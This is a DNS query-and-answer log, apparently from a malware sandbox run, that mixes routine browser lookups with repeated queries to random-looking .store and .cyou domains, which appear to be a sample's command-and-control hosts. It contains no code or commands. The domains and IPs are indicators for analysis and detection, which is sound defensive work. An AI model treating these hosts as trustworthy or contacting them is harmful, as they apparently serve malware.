Nov 4, 2024 17:33:35.084629059 CET	192.168.2.5	1.1.1.1	0x524b	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.085052013 CET	192.168.2.5	1.1.1.1	0xe057	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.093740940 CET	192.168.2.5	1.1.1.1	0xdfce	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:35.094909906 CET	192.168.2.5	1.1.1.1	0x32d4	Standard query (0)	twitter.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:35.251352072 CET	192.168.2.5	1.1.1.1	0x591a	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.262878895 CET	192.168.2.5	1.1.1.1	0xdbe4	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:35.279103994 CET	192.168.2.5	1.1.1.1	0x56c3	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:33:37.672070026 CET	192.168.2.5	1.1.1.1	0x76c1	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:48.339523077 CET	192.168.2.5	1.1.1.1	0x1b79	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:33:48.961133003 CET	192.168.2.5	1.1.1.1	0x74d9	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.248439074 CET	192.168.2.5	1.1.1.1	0x211c	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.254681110 CET	192.168.2.5	1.1.1.1	0x15d6	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.260288954 CET	192.168.2.5	1.1.1.1	0x56ca	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:34:00.268588066 CET	192.168.2.5	1.1.1.1	0x4ce	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.277256012 CET	192.168.2.5	1.1.1.1	0x9fde	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Nov 4, 2024 17:34:00.286669016 CET	192.168.2.5	1.1.1.1	0x5d8f	Standard query (0)	normandy.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.310103893 CET	192.168.2.5	1.1.1.1	0xb571	Standard query (0)	normandy-cdn.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:00.318283081 CET	192.168.2.5	1.1.1.1	0xa124	Standard query (0)	normandy-cdn.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:34:09.820523024 CET	192.168.2.5	1.1.1.1	0x2662	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:09.829231024 CET	192.168.2.5	1.1.1.1	0x49d1	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:34:23.750849009 CET	192.168.2.5	1.1.1.1	0x416d	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:31.040092945 CET	192.168.2.5	1.1.1.1	0x2c39	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:34:31.667974949 CET	192.168.2.5	1.1.1.1	0x4fd	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:34:50.796977043 CET	192.168.2.5	1.1.1.1	0x6c12	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:11.448817015 CET	192.168.2.5	1.1.1.1	0xf7f7	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:11.460678101 CET	192.168.2.5	1.1.1.1	0x7a21	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:11.468362093 CET	192.168.2.5	1.1.1.1	0xe556	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:12.085319996 CET	192.168.2.5	1.1.1.1	0x6fc8	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.127434969 CET	192.168.2.5	1.1.1.1	0x2290	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.155765057 CET	192.168.2.5	1.1.1.1	0xa6d7	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.181796074 CET	192.168.2.5	1.1.1.1	0x9384	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.207811117 CET	192.168.2.5	1.1.1.1	0xe333	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:14.233586073 CET	192.168.2.5	1.1.1.1	0x1424	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.769545078 CET	192.168.2.5	1.1.1.1	0xb2de	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.795849085 CET	192.168.2.5	1.1.1.1	0x1899	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.813292027 CET	192.168.2.5	1.1.1.1	0x1899	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.821208000 CET	192.168.2.5	1.1.1.1	0xa7c5	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.846944094 CET	192.168.2.5	1.1.1.1	0x8c60	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.872747898 CET	192.168.2.5	1.1.1.1	0x5e49	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:25.891335011 CET	192.168.2.5	1.1.1.1	0x5e49	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.068409920 CET	192.168.2.5	1.1.1.1	0x78fa	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.188380003 CET	192.168.2.5	1.1.1.1	0x3ce8	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.242079973 CET	192.168.2.5	1.1.1.1	0x6683	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.247447968 CET	192.168.2.5	1.1.1.1	0xb5d7	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.247447968 CET	192.168.2.5	1.1.1.1	0x257c	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.257932901 CET	192.168.2.5	1.1.1.1	0xe447	Standard query (0)	youtube.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.260448933 CET	192.168.2.5	1.1.1.1	0x2a91	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.284081936 CET	192.168.2.5	1.1.1.1	0xe99f	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.296705008 CET	192.168.2.5	1.1.1.1	0x5897	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.298120975 CET	192.168.2.5	1.1.1.1	0x9730	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.303021908 CET	192.168.2.5	1.1.1.1	0x709c	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.400454998 CET	192.168.2.5	1.1.1.1	0xb47c	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.475465059 CET	192.168.2.5	1.1.1.1	0x5a28	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.476181984 CET	192.168.2.5	1.1.1.1	0xe6ae	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.512583017 CET	192.168.2.5	1.1.1.1	0x6d14	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:40.526295900 CET	192.168.2.5	1.1.1.1	0xd360	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.601564884 CET	192.168.2.5	1.1.1.1	0xd360	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:40.601564884 CET	192.168.2.5	1.1.1.1	0x6d14	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:41.024494886 CET	192.168.2.5	1.1.1.1	0x7012	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:41.024717093 CET	192.168.2.5	1.1.1.1	0x4f4e	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:36:58.278233051 CET	192.168.2.5	1.1.1.1	0x61a8	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.297746897 CET	192.168.2.5	1.1.1.1	0x61a8	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.317070961 CET	192.168.2.5	1.1.1.1	0xdf61	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.345057964 CET	192.168.2.5	1.1.1.1	0xdf61	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.355915070 CET	192.168.2.5	1.1.1.1	0x7c4f	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.376465082 CET	192.168.2.5	1.1.1.1	0x7c4f	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.391566992 CET	192.168.2.5	1.1.1.1	0xb4d7	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.422537088 CET	192.168.2.5	1.1.1.1	0xb4d7	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.432265043 CET	192.168.2.5	1.1.1.1	0x43fe	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:36:58.453747988 CET	192.168.2.5	1.1.1.1	0x43fe	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:18.823415041 CET	192.168.2.5	1.1.1.1	0xb20	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.138526917 CET	192.168.2.5	1.1.1.1	0x5848	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.168581963 CET	192.168.2.5	1.1.1.1	0xcb61	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.229844093 CET	192.168.2.5	1.1.1.1	0xa349	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.255309105 CET	192.168.2.5	1.1.1.1	0xde4a	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.257061005 CET	192.168.2.5	1.1.1.1	0x609e	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.317193985 CET	192.168.2.5	1.1.1.1	0x4218	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.317599058 CET	192.168.2.5	1.1.1.1	0x8adf	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.363615990 CET	192.168.2.5	1.1.1.1	0xf587	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.363835096 CET	192.168.2.5	1.1.1.1	0x37bf	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:19.399136066 CET	192.168.2.5	1.1.1.1	0xac0f	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:19.400568962 CET	192.168.2.5	1.1.1.1	0x6c27	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:22.396286964 CET	192.168.2.5	1.1.1.1	0x55f9	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.396286964 CET	192.168.2.5	1.1.1.1	0x1315	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.397094965 CET	192.168.2.5	1.1.1.1	0x9a45	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.413582087 CET	192.168.2.5	1.1.1.1	0xe53	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.413688898 CET	192.168.2.5	1.1.1.1	0x6619	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:22.414206982 CET	192.168.2.5	1.1.1.1	0xdc0c	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.431029081 CET	192.168.2.5	1.1.1.1	0x7920	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:22.431476116 CET	192.168.2.5	1.1.1.1	0x6848	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.432286978 CET	192.168.2.5	1.1.1.1	0x23e8	Standard query (0)	twitter.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:22.451065063 CET	192.168.2.5	1.1.1.1	0x9091	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:22.471672058 CET	192.168.2.5	1.1.1.1	0x853	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:23.926808119 CET	192.168.2.5	1.1.1.1	0x9e0a	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:23.945143938 CET	192.168.2.5	1.1.1.1	0x2479	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 4, 2024 17:37:25.239727020 CET	192.168.2.5	1.1.1.1	0xca94	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:35.924591064 CET	192.168.2.5	1.1.1.1	0x63bc	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:37:39.554089069 CET	192.168.2.5	1.1.1.1	0x4561	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:56.679244041 CET	192.168.2.5	1.1.1.1	0x228	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:37:56.693615913 CET	192.168.2.5	1.1.1.1	0x82a7	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:38:18.735342026 CET	192.168.2.5	1.1.1.1	0x9ae0	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:38:37.937910080 CET	192.168.2.5	1.1.1.1	0xd115	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:38:37.946568012 CET	192.168.2.5	1.1.1.1	0xe65a	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:38:38.595097065 CET	192.168.2.5	1.1.1.1	0x68c2	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:58.740669966 CET	192.168.2.5	1.1.1.1	0x6f99	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:58.753873110 CET	192.168.2.5	1.1.1.1	0x32c7	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:39:58.767157078 CET	192.168.2.5	1.1.1.1	0xed40	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 4, 2024 17:39:59.407728910 CET	192.168.2.5	1.1.1.1	0xd014	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:40:20.231347084 CET	192.168.2.5	1.1.1.1	0x8d1b	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 4, 2024 17:32:23.044608116 CET	1.1.1.1	192.168.2.5	0xd86c	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.073225021 CET	1.1.1.1	192.168.2.5	0xaac	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.100536108 CET	1.1.1.1	192.168.2.5	0xfd66	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.127960920 CET	1.1.1.1	192.168.2.5	0xfb12	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.156085014 CET	1.1.1.1	192.168.2.5	0xd716	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.224704027 CET	1.1.1.1	192.168.2.5	0x1c6d	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:23.224704027 CET	1.1.1.1	192.168.2.5	0x1c6d	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:25.694427967 CET	1.1.1.1	192.168.2.5	0x241a	No error (0)	terracedjz.cyou		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:25.694427967 CET	1.1.1.1	192.168.2.5	0x241a	No error (0)	terracedjz.cyou		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:37.661703110 CET	1.1.1.1	192.168.2.5	0x3940	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.081686020 CET	1.1.1.1	192.168.2.5	0x4ebc	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.116869926 CET	1.1.1.1	192.168.2.5	0x8dee	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.192863941 CET	1.1.1.1	192.168.2.5	0xc5ea	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:38.219877005 CET	1.1.1.1	192.168.2.5	0x11dd	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:45.327636003 CET	1.1.1.1	192.168.2.5	0xf0b6	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:45.327646971 CET	1.1.1.1	192.168.2.5	0x3d1f	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 4, 2024 17:32:47.241301060 CET	1.1.1.1	192.168.2.5	0xdf87	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:47.382886887 CET	1.1.1.1	192.168.2.5	0x4600	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.490875006 CET	1.1.1.1	192.168.2.5	0xf503	No error (0)	youtube.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.491852045 CET	1.1.1.1	192.168.2.5	0x35c1	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:49.491852045 CET	1.1.1.1	192.168.2.5	0x35c1	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.510456085 CET	1.1.1.1	192.168.2.5	0xc63a	No error (0)	youtube.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.510468960 CET	1.1.1.1	192.168.2.5	0x371c	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:49.518225908 CET	1.1.1.1	192.168.2.5	0xdc9f	No error (0)	youtube.com			28	IN (0x0001)	false
Nov 4, 2024 17:32:49.519196987 CET	1.1.1.1	192.168.2.5	0x88ff	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Nov 4, 2024 17:32:50.969280958 CET	1.1.1.1	192.168.2.5	0xafd4	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:50.969392061 CET	1.1.1.1	192.168.2.5	0xab22	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:50.969392061 CET	1.1.1.1	192.168.2.5	0xab22	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:51.014214039 CET	1.1.1.1	192.168.2.5	0xca9	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:51.024792910 CET	1.1.1.1	192.168.2.5	0xf130	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.054308891 CET	1.1.1.1	192.168.2.5	0xb87	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:52.054308891 CET	1.1.1.1	192.168.2.5	0xb87	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.055164099 CET	1.1.1.1	192.168.2.5	0x6631	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:52.055164099 CET	1.1.1.1	192.168.2.5	0x6631	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.066833973 CET	1.1.1.1	192.168.2.5	0x67c	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.369926929 CET	1.1.1.1	192.168.2.5	0x8ea6	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:52.369926929 CET	1.1.1.1	192.168.2.5	0x8ea6	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:52.382529974 CET	1.1.1.1	192.168.2.5	0xf41c	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:53.081005096 CET	1.1.1.1	192.168.2.5	0x176a	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:53.081005096 CET	1.1.1.1	192.168.2.5	0x176a	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:53.081005096 CET	1.1.1.1	192.168.2.5	0x176a	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:53.111988068 CET	1.1.1.1	192.168.2.5	0x9c5c	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:53.138638020 CET	1.1.1.1	192.168.2.5	0xa35	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Nov 4, 2024 17:32:59.308480978 CET	1.1.1.1	192.168.2.5	0xd6e8	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:59.309665918 CET	1.1.1.1	192.168.2.5	0x9734	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:59.317751884 CET	1.1.1.1	192.168.2.5	0x6366	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:32:59.317751884 CET	1.1.1.1	192.168.2.5	0x6366	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:32:59.321208000 CET	1.1.1.1	192.168.2.5	0x4753	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:00.535653114 CET	1.1.1.1	192.168.2.5	0xcd58	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:00.536417007 CET	1.1.1.1	192.168.2.5	0xc76a	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.340653896 CET	1.1.1.1	192.168.2.5	0x9963	No error (0)	sb.scorecardresearch.com		18.245.60.72	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.340653896 CET	1.1.1.1	192.168.2.5	0x9963	No error (0)	sb.scorecardresearch.com		18.245.60.53	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.340653896 CET	1.1.1.1	192.168.2.5	0x9963	No error (0)	sb.scorecardresearch.com		18.245.60.107	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.340653896 CET	1.1.1.1	192.168.2.5	0x9963	No error (0)	sb.scorecardresearch.com		18.245.60.76	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:02.358663082 CET	1.1.1.1	192.168.2.5	0x67bf	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.359050035 CET	1.1.1.1	192.168.2.5	0x6843	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.367748976 CET	1.1.1.1	192.168.2.5	0xa157	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.367933035 CET	1.1.1.1	192.168.2.5	0x593f	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.376674891 CET	1.1.1.1	192.168.2.5	0xe790	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:02.377377033 CET	1.1.1.1	192.168.2.5	0xa22b	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 17:33:04.215462923 CET	1.1.1.1	192.168.2.5	0xb170	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.215462923 CET	1.1.1.1	192.168.2.5	0xb170	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 4, 2024 17:33:04.215558052 CET	1.1.1.1	192.168.2.5	0xe8e	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
